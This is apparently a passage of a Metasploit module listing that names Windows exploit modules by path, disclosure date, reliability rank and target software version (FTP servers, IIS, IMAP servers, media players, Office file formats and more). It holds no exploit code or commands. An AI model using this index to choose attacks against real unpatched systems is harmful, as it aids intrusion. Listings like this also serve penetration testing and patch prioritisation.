   windows/fileformat/fdm_torrent                                 2009-02-02       good       Free Download Manager Torrent Parsing Buffer Overflow
   windows/fileformat/feeddemon_opml                              2009-02-09       great      FeedDemon <= 3.1.0.12 Stack Buffer Overflow
   windows/fileformat/foxit_reader_filewrite                      2011-03-05       normal     Foxit PDF Reader 4.2 Javascript File Write
   windows/fileformat/foxit_title_bof                             2010-11-13       great      Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
   windows/fileformat/free_mp3_ripper_wav                         2011-08-27       great      Free MP3 CD Ripper 1.1 (WAV File) Stack Buffer Overflow
   windows/fileformat/galan_fileformat_bof                        2009-12-07       normal     gAlan 0.2.1 Buffer Overflow Exploit
   windows/fileformat/gta_samp                                    2011-09-18       normal     GTA SA-MP server.cfg Buffer Overflow
   windows/fileformat/hhw_hhp_compiledfile_bof                    2006-02-06       good       HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit
   windows/fileformat/hhw_hhp_contentfile_bof                     2006-02-06       good       HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit
   windows/fileformat/hhw_hhp_indexfile_bof                       2009-01-17       good       HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit
   windows/fileformat/ht_mp3player_ht3_bof                        2009-06-29       good       HT-MP3Player 1.0 HT3 File Parsing Buffer Overflow
   windows/fileformat/ideal_migration_ipj                         2009-12-05       great      PointDev IDEAL Migration Buffer Overflow
   windows/fileformat/lotusnotes_lzh                              2011-05-24       good       Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview(.lzh attachment)
   windows/fileformat/magix_musikmaker_16_mmm                     2011-04-26       good       Magix Musik Maker 16 .mmm Stack Buffer Overflow
   windows/fileformat/mcafee_hercules_deletesnapshot              2008-08-04       low        McAfee Remediation Client ActiveX Control Buffer Overflow
   windows/fileformat/mediajukebox                                2009-07-01       normal     Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)
   windows/fileformat/microp_mppl                                 2010-08-23       great      MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow
   windows/fileformat/millenium_mp3_pls                           2009-07-30       great      Millenium MP3 Studio 2.0 (PLS File) Stack Buffer Overflow
   windows/fileformat/mini_stream_pls_bof                         2010-07-16       great      Mini-Stream RM-MP3 Converter v3.1.2.1 (PLS File) Stack Buffer Overflow
   windows/fileformat/mjm_coreplayer2011_s3m                      2011-04-30       good       MJM Core Player 2011 .s3m Stack Buffer Overflow
   windows/fileformat/mjm_quickplayer_s3m                         2011-04-30       good       MJM QuickPlayer 1.00 beta 60a / QuickPlayer 2010 .s3m Stack Buffer Overflow
   windows/fileformat/moxa_mediadbplayback                        2010-10-19       average    MOXA MediaDBPlayback ActiveX Control Buffer Overflow
   windows/fileformat/ms09_067_excel_featheader                   2009-11-10       good       Microsoft Excel Malformed FEATHEADER Record Vulnerability
   windows/fileformat/ms10_004_textbytesatom                      2010-02-09       good       Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow
   windows/fileformat/ms10_038_excel_obj_bof                      2010-06-08       normal     MS11-038 Microsoft Office Excel Malformed OBJ Record Handling Overflow
   windows/fileformat/ms10_087_rtf_pfragments_bof                 2010-11-09       great      Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)
   windows/fileformat/ms11_006_createsizeddibsection              2010-12-15       great      Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
   windows/fileformat/ms11_021_xlb_bof                            2011-08-09       normal     MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow
   windows/fileformat/ms_visual_basic_vbp                         2007-09-04       good       Microsoft Visual Basic VBP Buffer Overflow
   windows/fileformat/msworks_wkspictureinterface                 2008-11-28       low        Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Exploit
   windows/fileformat/mymp3player_m3u                             2010-03-18       good       Steinberg MyMP3Player 3.0 Buffer Overflow
   windows/fileformat/nuance_pdf_launch_overflow                  2010-10-08       great      Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
   windows/fileformat/orbital_viewer_orb                          2010-02-27       great      Orbital Viewer ORB File Parsing Buffer Overflow
   windows/fileformat/proshow_cellimage_bof                       2009-08-20       great      ProShow Gold v4.0.2549 (PSH File) Stack Buffer Overflow
   windows/fileformat/real_networks_netzip_bof                    2011-01-30       good       Real Networks Netzip Classic 7.5.1 86 File Parsing Buffer Overflow Vulnerability
   windows/fileformat/safenet_softremote_groupname                2009-10-30       good       SafeNet SoftRemote GROUPNAME Buffer Overflow
   windows/fileformat/sascam_get                                  2008-12-29       low        SasCam Webcam Server v.2.6.5 Get() method Buffer Overflow
   windows/fileformat/scadaphone_zip                              2011-09-12       good       ScadaTEC ScadaPhone <= v5.3.11.1230 Stack Buffer Overflow
   windows/fileformat/somplplayer_m3u                             2010-01-22       great      S.O.M.P.L 1.0 Player Buffer Overflow
   windows/fileformat/subtitle_processor_m3u_bof                  2011-04-26       normal     Subtitle Processor 7.7.1 .M3U SEH Unicode Buffer Overflow
   windows/fileformat/tugzip                                      2008-10-28       good       TugZip 3.5 Zip File Parsing Buffer Overflow Vulnerability
   windows/fileformat/ultraiso_ccd                                2009-04-03       great      UltraISO CCD File Parsing Buffer Overflow
   windows/fileformat/ultraiso_cue                                2007-05-24       great      UltraISO CUE File Parsing Buffer Overflow
   windows/fileformat/ursoft_w32dasm                              2005-01-24       good       URSoft W32Dasm Disassembler Function Buffer Overflow
   windows/fileformat/varicad_dwb                                 2010-03-17       great      VariCAD 2010-2.05 EN (DWB File) Stack Buffer Overflow
   windows/fileformat/videolan_tivo                               2008-10-22       good       VideoLAN VLC TiVo Buffer Overflow
   windows/fileformat/videospirit_visprj                          2011-04-11       good       VeryTools Video Spirit Pro <= 1.70
   windows/fileformat/visio_dxf_bof                               2010-05-04       good       Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability
   windows/fileformat/visiwave_vwr_type                           2011-05-20       great      VisiWave VWR File Parsing Vulnerability
   windows/fileformat/vlc_modplug_s3m                             2011-04-07       average    VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow
   windows/fileformat/vlc_smb_uri                                 2009-06-24       great      VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow
   windows/fileformat/vlc_webm                                    2011-01-31       good       VideoLAN VLC MKV Memory Corruption
   windows/fileformat/vuplayer_cue                                2009-08-18       good       VUPlayer CUE Buffer Overflow
   windows/fileformat/vuplayer_m3u                                2009-08-18       good       VUPlayer M3U Buffer Overflow
   windows/fileformat/wireshark_packet_dect                       2011-04-18       good       Wireshark <= 1.4.4 packet-dect.c Stack Buffer Overflow (local)
   windows/fileformat/wm_downloader_m3u                           2010-07-28       normal     WM Downloader 3.1.2.2 Buffer Overflow
   windows/fileformat/xenorate_xpl_bof                            2009-08-19       great      Xenorate 2.50 (.xpl) universal Local Buffer Overflow Exploit (SEH)
   windows/fileformat/xion_m3u_sehbof                             2010-11-23       great      Xion Audio Player 1.0.126 Unicode Stack Buffer Overflow
   windows/fileformat/zinfaudioplayer221_pls                      2004-09-24       good       Zinf Audio Player 2.2.1 (PLS File) Stack Buffer Overflow
   windows/firewall/blackice_pam_icq                              2004-03-18       great      ISS PAM.dll ICQ Parser Buffer Overflow
   windows/firewall/kerio_auth                                    2003-04-28       average    Kerio Firewall 2.1.4 Authentication Packet Overflow
   windows/ftp/32bitftp_list_reply                                2010-10-12       good       32bit FTP Client Stack Buffer Overflow
   windows/ftp/3cdaemon_ftp_user                                  2005-01-04       average    3Com 3CDaemon 2.0 FTP Username Overflow
   windows/ftp/aasync_list_reply                                  2010-10-12       good       AASync v2.2.1.0 (Win32) Stack Buffer Overflow (LIST)
   windows/ftp/ability_server_stor                                2004-10-22       normal     Ability Server 2.34 STOR Command Stack Buffer Overflow
   windows/ftp/absolute_ftp_list_bof                              2011-11-09       normal     AbsoluteFTP 1.9.6 - 2.2.10 Remote Buffer Overflow (LIST)
   windows/ftp/cesarftp_mkd                                       2006-06-12       average    Cesar FTP 0.99g MKD Command Buffer Overflow
   windows/ftp/dreamftp_format                                    2004-03-03       good       BolinTech Dream FTP Server 1.02 Format String
   windows/ftp/easyfilesharing_pass                               2006-07-31       average    Easy File Sharing FTP Server 2.0 PASS Overflow
   windows/ftp/easyftp_cwd_fixret                                 2010-02-16       great      EasyFTP Server <= 1.7.0.11 CWD Command Stack Buffer Overflow
   windows/ftp/easyftp_list_fixret                                2010-07-05       great      EasyFTP Server <= 1.7.0.11 LIST Command Stack Buffer Overflow
   windows/ftp/easyftp_mkd_fixret                                 2010-04-04       great      EasyFTP Server <= 1.7.0.11 MKD Command Stack Buffer Overflow
   windows/ftp/filecopa_list_overflow                             2006-07-19       average    FileCopa FTP Server pre 18 Jul Version
   windows/ftp/filewrangler_list_reply                            2010-10-12       good       FileWrangler 5.30 Stack Buffer Overflow
   windows/ftp/freeftpd_user                                      2005-11-16       average    freeFTPd 1.0 Username Overflow
   windows/ftp/ftpgetter_pwd_reply                                2010-10-12       good       FTPGetter Standard v3.55.0.05 Stack Buffer Overflow (PWD)
   windows/ftp/ftppad_list_reply                                  2010-10-12       good       FTPPad 1.2.0 Stack Buffer Overflow
   windows/ftp/ftpshell51_pwd_reply                               2010-10-12       good       FTPShell 5.1 Stack Buffer Overflow
   windows/ftp/ftpsynch_list_reply                                2010-10-12       good       FTP Synchronizer Professional 4.0.73.274 Stack Buffer Overflow
   windows/ftp/gekkomgr_list_reply                                2010-10-12       good       Gekko Manager FTP Client Stack Buffer Overflow
   windows/ftp/globalscapeftp_input                               2005-05-01       great      GlobalSCAPE Secure FTP Server Input Overflow
   windows/ftp/goldenftp_pass_bof                                 2011-01-23       average    GoldenFTP PASS Stack Buffer Overflow
   windows/ftp/httpdx_tolog_format                                2009-11-17       great      HTTPDX tolog() Function Format String Vulnerability
   windows/ftp/leapftp_list_reply                                 2010-10-12       good       LeapFTP 3.0.1 Stack Buffer Overflow
   windows/ftp/leapftp_pasv_reply                                 2003-06-09       normal     LeapWare LeapFTP v2.7.3.600 PASV Reply Client Overflow
   windows/ftp/ms09_053_ftpd_nlst                                 2009-08-31       great      Microsoft IIS FTP Server NLST Response Overflow
   windows/ftp/netterm_netftpd_user                               2005-04-26       great      NetTerm NetFTPD USER Buffer Overflow
   windows/ftp/odin_list_reply                                    2010-10-12       good       Odin Secure FTP 4.1 Stack Buffer Overflow (LIST)
   windows/ftp/oracle9i_xdb_ftp_pass                              2003-08-18       great      Oracle 9i XDB FTP PASS Overflow (win32)
   windows/ftp/oracle9i_xdb_ftp_unlock                            2003-08-18       great      Oracle 9i XDB FTP UNLOCK Overflow (win32)
   windows/ftp/proftp_banner                                      2009-08-25       normal     ProFTP 2.9 Banner Remote Buffer Overflow Exploit
   windows/ftp/sami_ftpd_user                                     2006-01-24       normal     KarjaSoft Sami FTP Server v2.02 USER Overflow
   windows/ftp/sasser_ftpd_port                                   2004-05-10       average    Sasser Worm avserve FTP PORT Buffer Overflow
   windows/ftp/scriptftp_list                                     2011-10-12       good       ScriptFTP <= 3.3 Remote Buffer Overflow (LIST)
   windows/ftp/seagull_list_reply                                 2010-10-12       good       Seagull FTP v3.3 build 409 Stack Buffer Overflow
   windows/ftp/servu_chmod                                        2004-12-31       normal     Serv-U FTP Server <4.2 Buffer Overflow
   windows/ftp/servu_mdtm                                         2004-02-26       good       Serv-U FTPD MDTM Overflow
   windows/ftp/slimftpd_list_concat                               2005-07-21       great      SlimFTPd LIST Concatenation Overflow
   windows/ftp/trellian_client_pasv                               2010-04-11       normal     Trellian FTP Client 3.01 PASV Remote Buffer Overflow
   windows/ftp/vermillion_ftpd_port                               2009-09-23       great      Vermillion FTP Daemon PORT Command Memory Corruption
   windows/ftp/warftpd_165_pass                                   1998-03-19       average    War-FTPD 1.65 Password Overflow
   windows/ftp/warftpd_165_user                                   1998-03-19       average    War-FTPD 1.65 Username Overflow
   windows/ftp/wftpd_size                                         2006-08-23       average    Texas Imperial Software WFTPD 3.23 SIZE Overflow
   windows/ftp/wsftp_server_503_mkd                               2004-11-29       great      WS-FTP Server 5.03 MKD Overflow
   windows/ftp/wsftp_server_505_xmd5                              2006-09-14       average    Ipswitch WS_FTP Server 5.05 XMD5 Overflow
   windows/ftp/xftp_client_pwd                                    2010-04-22       normal     Xftp FTP Client 3.0 PWD Remote Buffer Overflow Exploit
   windows/ftp/xlink_client                                       2009-10-03       normal     Xlink FTP Client Buffer Overflow
   windows/ftp/xlink_server                                       2009-10-03       good       Xlink FTP Server Buffer Overflow
   windows/games/mohaa_getinfo                                    2004-07-17       great      Medal Of Honor Allied Assault getinfo Stack Buffer Overflow
   windows/games/racer_503beta5                                   2008-08-10       great      Racer v0.5.3 beta 5 Buffer Overflow
   windows/games/ut2004_secure                                    2004-06-18       good       Unreal Tournament 2004 "secure" Overflow (Win32)
   windows/http/adobe_robohelper_authbypass                       2009-09-23       excellent  Adobe RoboHelp Server 8 Arbitrary File Upload and Execute
   windows/http/altn_securitygateway                              2008-06-02       average    Alt-N SecurityGateway username Buffer Overflow
   windows/http/altn_webadmin                                     2003-06-24       average    Alt-N WebAdmin USER Buffer Overflow
   windows/http/amlibweb_webquerydll_app                          2010-08-03       normal     Amlibweb NetOpacs webquery.dll Stack Buffer Overflow
   windows/http/apache_chunked                                    2002-06-19       good       Apache Win32 Chunked Encoding
   windows/http/apache_mod_rewrite_ldap                           2006-07-28       great      Apache module mod_rewrite LDAP protocol Buffer Overflow
   windows/http/apache_modjk_overflow                             2007-03-02       great      Apache mod_jk 1.2.20 Buffer Overflow
   windows/http/badblue_ext_overflow                              2003-04-20       great      BadBlue 2.5 EXT.dll Buffer Overflow
   windows/http/badblue_passthru                                  2007-12-10       great      BadBlue 2.72b PassThru Buffer Overflow
   windows/http/bea_weblogic_jsessionid                           2009-01-13       good       BEA WebLogic JSESSIONID Cookie Value Overflow
   windows/http/bea_weblogic_transfer_encoding                    2008-09-09       great      BEA Weblogic Transfer-Encoding Buffer Overflow
   windows/http/belkin_bulldog                                    2009-03-08       average    Belkin Bulldog Plus Web Service Buffer Overflow
   windows/http/ca_arcserve_rpc_authbypass                        2011-07-25       excellent  CA Arcserve D2D GWT RPC Credential Information Disclosure
   windows/http/ca_igateway_debug                                 2005-10-06       average    CA iTechnology iGateway Debug Mode Buffer Overflow
   windows/http/ca_totaldefense_regeneratereports                 2011-04-13       excellent  CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection
   windows/http/coldfusion_fckeditor                              2009-07-03       excellent  ColdFusion 8.0.1 Arbitrary File Upload and Execute
   windows/http/easyftp_list                                      2010-02-18       great      EasyFTP Server <= 1.7.0.11 list.html path Stack Buffer Overflow
   windows/http/edirectory_host                                   2006-10-21       great      Novell eDirectory NDS Server Host Header Overflow
   windows/http/edirectory_imonitor                               2005-08-11       great      eDirectory 8.7.3 iMonitor Remote Stack Buffer Overflow
   windows/http/efs_easychatserver_username                       2007-08-14       great      EFS Easy Chat Server Authentication Request Handling Buffer Overflow
   windows/http/fdm_auth_header                                   2009-02-02       great      Free Download Manager Remote Control Server Buffer Overflow
   windows/http/hp_nnm_getnnmdata_hostname                        2010-05-11       great      HP OpenView Network Node Manager getnnmdata.exe (Hostname) CGI Buffer Overflow
   windows/http/hp_nnm_getnnmdata_icount                          2010-05-11       great      HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow
   windows/http/hp_nnm_getnnmdata_maxage                          2010-05-11       great      HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow
   windows/http/hp_nnm_nnmrptconfig_nameparams                    2011-01-10       normal     HP OpenView NNM nnmRptConfig nameParams Buffer Overflow
   windows/http/hp_nnm_nnmrptconfig_schdparams                    2011-01-10       normal     HP OpenView NNM nnmRptConfig.exe schdParams Buffer Overflow
   windows/http/hp_nnm_openview5                                  2007-12-06       great      HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow
   windows/http/hp_nnm_ovalarm_lang                               2009-12-09       great      HP OpenView Network Node Manager ovalarm.exe CGI Buffer Overflow
   windows/http/hp_nnm_ovas                                       2008-04-02       good       HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow
   windows/http/hp_nnm_ovwebhelp                                  2009-12-09       great      HP OpenView Network Node Manager OvWebHelp.exe CGI Buffer Overflow
   windows/http/hp_nnm_ovwebsnmpsrv_main                          2010-06-16       great      HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow
   windows/http/hp_nnm_ovwebsnmpsrv_ovutil                        2010-06-16       great      HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow
   windows/http/hp_nnm_ovwebsnmpsrv_uro                           2010-06-08       great      HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow
   windows/http/hp_nnm_snmp                                       2009-12-09       great      HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow
   windows/http/hp_nnm_snmpviewer_actapp                          2010-05-11       great      HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow
   windows/http/hp_nnm_toolbar_01                                 2009-01-07       great      HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow
   windows/http/hp_nnm_toolbar_02                                 2009-01-21       normal     HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow
   windows/http/hp_nnm_webappmon_execvp                           2010-07-20       great      HP OpenView Network Node Manager execvp_nc Buffer Overflow
   windows/http/hp_nnm_webappmon_ovjavalocale                     2010-08-03       great      HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow
   windows/http/hp_openview_insight_backdoor                      2011-01-31       excellent  HP OpenView Performance Insight Server Backdoor Account Code Execution
   windows/http/hp_power_manager_filename                         2011-10-19       normal     HP Power Manager 'formExportDataLogs' Buffer Overflow
   windows/http/hp_power_manager_login                            2009-11-04       average    Hewlett-Packard Power Manager Administration Buffer Overflow
   windows/http/httpdx_handlepeer                                 2009-10-08       great      HTTPDX h_handlepeer() Function Buffer Overflow
   windows/http/httpdx_tolog_format                               2009-11-17       great      HTTPDX tolog() Function Format String Vulnerability
   windows/http/ia_webmail                                        2003-11-03       average    IA WebMail 3.x Buffer Overflow
   windows/http/ibm_tivoli_endpoint_bof                           2011-05-31       good       IBM Tivoli Endpoint Manager POST Query Buffer Overflow
   windows/http/ibm_tpmfosd_overflow                              2007-05-02       good       IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow
   windows/http/ibm_tsm_cad_header                                2007-09-24       good       IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
   windows/http/icecast_header                                    2004-09-28       great      Icecast (<= 2.0.1) Header Overwrite (win32)
   windows/http/integard_password_bof                             2010-09-07       great      Race River Integard Home/Pro LoginAdmin Password Stack Buffer Overflow
   windows/http/intersystems_cache                                2009-09-29       great      InterSystems Cache UtilConfigHome.csp Argument Buffer Overflow
   windows/http/ipswitch_wug_maincfgret                           2004-08-25       great      Ipswitch WhatsUp Gold 8.03 Buffer Overflow
   windows/http/kolibri_http                                      2010-12-26       good       Kolibri <= v2.0 HTTP Server HEAD Buffer Overflow
   windows/http/mailenable_auth_header                            2005-04-24       great      MailEnable Authorization Header Buffer Overflow
   windows/http/manageengine_apps_mngr                            2011-04-08       average    ManageEngine Applications Manager Authenticated Code Execution
   windows/http/maxdb_webdbm_database                             2006-08-29       good       MaxDB WebDBM Database Parameter Overflow
   windows/http/maxdb_webdbm_get_overflow                         2005-04-26       good       MaxDB WebDBM GET Buffer Overflow
   windows/http/mcafee_epolicy_source                             2006-07-17       average    McAfee ePolicy Orchestrator / ProtectionPilot Overflow
   windows/http/mdaemon_worldclient_form2raw                      2003-12-29       great      MDaemon <= 6.8.5 WorldClient form2raw.cgi Stack Buffer Overflow
   windows/http/minishare_get_overflow                            2004-11-07       average    Minishare 1.4.1 Buffer Overflow
   windows/http/navicopa_get_overflow                             2006-09-28       great      NaviCOPA 2.0.1 URL Handling Buffer Overflow
   windows/http/novell_imanager_upload                            2010-10-01       excellent  Novell iManager getMultiPartParameters Arbitrary File Upload
   windows/http/novell_messenger_acceptlang                       2006-04-13       average    Novell Messenger Server 2.0 Accept-Language Overflow
   windows/http/nowsms                                            2008-02-19       good       Now SMS/MMS Gateway Buffer Overflow
   windows/http/oracle9i_xdb_pass                                 2003-08-18       great      Oracle 9i XDB HTTP PASS Overflow (win32)
   windows/http/osb_uname_jlist                                   2010-07-13       excellent  Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability
   windows/http/peercast_url                                      2006-03-08       average    PeerCast <= 0.1216 URL Handling Buffer Overflow (win32)
   windows/http/privatewire_gateway                               2006-06-26       average    Private Wire Gateway Buffer Overflow
   windows/http/psoproxy91_overflow                               2004-02-20       average    PSO Proxy v0.91 Stack Buffer Overflow
   windows/http/sambar6_search_results                            2003-06-21       normal     Sambar 6 Search Results Buffer Overflow
   windows/http/sap_mgmt_con_osexec_payload                       2011-03-08       excellent  SAP Management Console OSExecute Payload Execution
   windows/http/sapdb_webtools                                    2007-07-05       great      SAP DB 7.4 WebTools Buffer Overflow
   windows/http/savant_31_overflow                                2002-09-10       great      Savant 3.1 Web Server Overflow
   windows/http/servu_session_cookie                              2009-11-01       good       Rhinosoft Serv-U Session Cookie Buffer Overflow
   windows/http/shoutcast_format                                  2004-12-23       average    SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow
   windows/http/shttpd_post                                       2006-10-06       average    SHTTPD <= 1.34 URI-Encoded POST Request Overflow (win32)
   windows/http/steamcast_useragent                               2008-01-24       average    Streamcast <= 0.9.75 HTTP User-Agent Buffer Overflow
   windows/http/sybase_easerver                                   2005-07-25       average    Sybase EAServer 5.2 Remote Stack Buffer Overflow
   windows/http/trackercam_phparg_overflow                        2005-02-18       average    TrackerCam PHP Argument Buffer Overflow
   windows/http/trendmicro_officescan                             2007-06-28       good       Trend Micro OfficeScan Remote Stack Buffer Overflow
   windows/http/webster_http                                      2002-12-02       average    Webster HTTP Server GET Buffer Overflow
   windows/http/xampp_webdav_upload_php                                            excellent  XAMPP WebDAV PHP Upload
   windows/http/xitami_if_mod_since                               2007-09-24       average    Xitami 2.5c2 Web Server If-Modified-Since Overflow
   windows/http/zenworks_uploadservlet                            2010-03-30       excellent  Novell ZENworks Configuration Management Remote Execution
   windows/iis/iis_webdav_upload_asp                              1994-01-01       excellent  Microsoft IIS WebDAV Write Access Code Execution
   windows/iis/ms01_023_printer                                   2001-05-01       good       Microsoft IIS 5.0 Printer Host Header Overflow
   windows/iis/ms01_026_dbldecode                                 2001-05-15       excellent  Microsoft IIS/PWS CGI Filename Double Decode Command Execution
   windows/iis/ms01_033_idq                                       2001-06-18       good       Microsoft IIS 5.0 IDQ Path Overflow
   windows/iis/ms02_018_htr                                       2002-04-10       good       Microsoft IIS 4.0 .HTR Path Overflow
   windows/iis/ms03_007_ntdll_webdav                              2003-05-30       great      Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow
   windows/imap/eudora_list                                       2005-12-20       great      Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow
   windows/imap/imail_delete                                      2004-11-12       average    IMail IMAP4D Delete Overflow
   windows/imap/ipswitch_search                                   2007-07-18       average    Ipswitch IMail IMAP SEARCH Buffer Overflow
   windows/imap/mailenable_login                                  2006-12-11       great      MailEnable IMAPD (2.34/2.35) Login Request Buffer Overflow
   windows/imap/mailenable_status                                 2005-07-13       great      MailEnable IMAPD (1.54) STATUS Request Buffer Overflow
   windows/imap/mailenable_w3c_select                             2005-10-03       great      MailEnable IMAPD W3C Logging Buffer Overflow
   windows/imap/mdaemon_cram_md5                                  2004-11-12       great      Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow
   windows/imap/mdaemon_fetch                                     2008-03-13       great      MDaemon 9.6.4 IMAPD FETCH Buffer Overflow
   windows/imap/mercur_imap_select_overflow                       2006-03-17       average    Mercur v5.0 IMAP SP3 SELECT Buffer Overflow
   windows/imap/mercur_login                                      2006-03-17       average    Mercur Messaging 2005 IMAP Login Buffer Overflow
   windows/imap/mercury_login                                     2007-03-06       average    Mercury/32 <= 4.01b LOGIN Buffer Overflow
   windows/imap/mercury_rename                                    2004-11-29       average    Mercury/32 v4.01a IMAP RENAME Buffer Overflow
   windows/imap/novell_netmail_append                             2006-12-23       average    Novell NetMail <= 3.52d IMAP APPEND Buffer Overflow
   windows/imap/novell_netmail_auth                               2007-01-07       average    Novell NetMail <=3.52d IMAP AUTHENTICATE Buffer Overflow
   windows/imap/novell_netmail_status                             2005-11-18       average    Novell NetMail <= 3.52d IMAP STATUS Buffer Overflow
   windows/imap/novell_netmail_subscribe                          2006-12-23       average    Novell NetMail <= 3.52d IMAP SUBSCRIBE Buffer Overflow
   windows/isapi/ms00_094_pbserver                                2000-12-04       good       Microsoft IIS Phone Book Service Overflow
   windows/isapi/ms03_022_nsiislog_post                           2003-06-25       good       Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow
   windows/isapi/ms03_051_fp30reg_chunked                         2003-11-11       good       Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow
   windows/isapi/rsa_webagent_redirect                            2005-10-21       good       Microsoft IIS ISAPI RSA WebAgent Redirect Overflow
   windows/isapi/w3who_query                                      2004-12-06       good       Microsoft IIS ISAPI w3who.dll Query String Overflow
   windows/ldap/imail_thc                                         2004-02-17       average    IMail LDAP Service Buffer Overflow
   windows/ldap/pgp_keyserver7                                    2001-07-16       good       Network Associates PGP KeyServer 7 LDAP Buffer Overflow
   windows/license/calicclnt_getconfig                            2005-03-02       average    Computer Associates License Client GETCONFIG Overflow
   windows/license/calicserv_getconfig                            2005-03-02       normal     Computer Associates License Server GETCONFIG Overflow
   windows/license/sentinel_lm7_udp                               2005-03-07       average    SentinelLM UDP Buffer Overflow
   windows/lotus/domino_http_accept_language                      2008-05-20       average    IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow
   windows/lotus/domino_icalendar_organizer                       2010-09-14       normal     IBM Lotus Domino iCalendar MAILTO Buffer Overflow
   windows/lotus/domino_sametime_stmux                            2008-05-21       average    IBM Lotus Domino Sametime STMux.exe Stack Buffer Overflow
   windows/lotus/lotusnotes_lzh                                   2011-05-24       normal     Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview(.lzh attachment)
   windows/lpd/hummingbird_exceed                                 2005-05-27       average    Hummingbird Connectivity 10 SP5 LPD Buffer Overflow
   windows/lpd/niprint                                            2003-11-05       good       NIPrint LPD Request Overflow
   windows/lpd/saplpd                                             2008-02-04       good       SAP SAPLPD 6.28 Buffer Overflow
   windows/lpd/wincomlpd_admin                                    2008-02-04       good       WinComLPD <= 3.0.2 Buffer Overflow
   windows/misc/agentxpp_receive_agentx                           2010-04-16       good       AgentX++ Master AgentX::receive_agentx Stack Buffer Overflow
   windows/misc/apple_quicktime_rtsp_response                     2007-11-23       normal     Apple QuickTime 7.3 RTSP Response Header Buffer Overflow
   windows/misc/asus_dpcproxy_overflow                            2008-03-21       average    Asus Dpcproxy Buffer Overflow
   windows/misc/avidphoneticindexer                               2011-11-29       normal     Avid Media Composer 5.5 - Avid Phonetic Indexer Stack Overflow
   windows/misc/bakbone_netvault_heap                             2005-04-01       average    BakBone NetVault Remote Heap Overflow
   windows/misc/bcaaa_bof                                         2011-04-04       good       Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow
   windows/misc/bigant_server                                     2008-04-15       average    BigAnt Server 2.2 Buffer Overflow
   windows/misc/bigant_server_250                                 2008-04-15       great      BigAnt Server 2.50 SP1 Buffer Overflow
   windows/misc/bigant_server_usv                                 2009-12-29       great      BigAnt Server 2.52 USV Buffer Overflow
   windows/misc/bomberclone_overflow                              2006-02-16       average    Bomberclone 0.11.6 Buffer Overflow
   windows/misc/bopup_comm                                        2009-06-18       good       Bopup Communications Server Buffer Overflow
   windows/misc/borland_interbase                                 2007-07-24       average    Borland Interbase Create-Request Buffer Overflow
   windows/misc/borland_starteam                                  2008-04-02       average    Borland CaliberRM StarTeam Multicast Service Buffer Overflow
   windows/misc/citrix_streamprocess                              2011-01-20       good       Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow
   windows/misc/doubletake                                        2008-06-04       average    DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow
   windows/misc/eiqnetworks_esa                                   2006-07-24       average    eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow
   windows/misc/eiqnetworks_esa_topology                          2006-07-25       average    eIQNetworks ESA Topology DELETEDEVICE Overflow
   windows/misc/eureka_mail_err                                   2009-10-22       normal     Eureka Email 2.2q ERR Remote Buffer Overflow Exploit
   windows/misc/fb_isc_attach_database                            2007-10-03       average    Firebird Relational Database isc_attach_database() Buffer Overflow
   windows/misc/fb_isc_create_database                            2007-10-03       average    Firebird Relational Database isc_create_database() Buffer Overflow
   windows/misc/fb_svc_attach                                     2007-10-03       average    Firebird Relational Database SVC_attach() Buffer Overflow
   windows/misc/hp_omniinet_1                                     2009-12-17       great      HP OmniInet.exe MSG_PROTOCOL Buffer Overflow
   windows/misc/hp_omniinet_2                                     2009-12-17       great      HP OmniInet.exe MSG_PROTOCOL Buffer Overflow
   windows/misc/hp_omniinet_3                                     2011-06-29       great      HP OmniInet.exe Opcode 27 Buffer Overflow
   windows/misc/hp_omniinet_4                                     2011-06-29       good       HP OmniInet.exe Opcode 20 Buffer Overflow
   windows/misc/hp_ovtrace                                        2007-08-09       average    HP OpenView Operations OVTrace Buffer Overflow
   windows/misc/ib_isc_attach_database                            2007-10-03       good       Borland InterBase isc_attach_database() Buffer Overflow
   windows/misc/ib_isc_create_database                            2007-10-03       good       Borland InterBase isc_create_database() Buffer Overflow
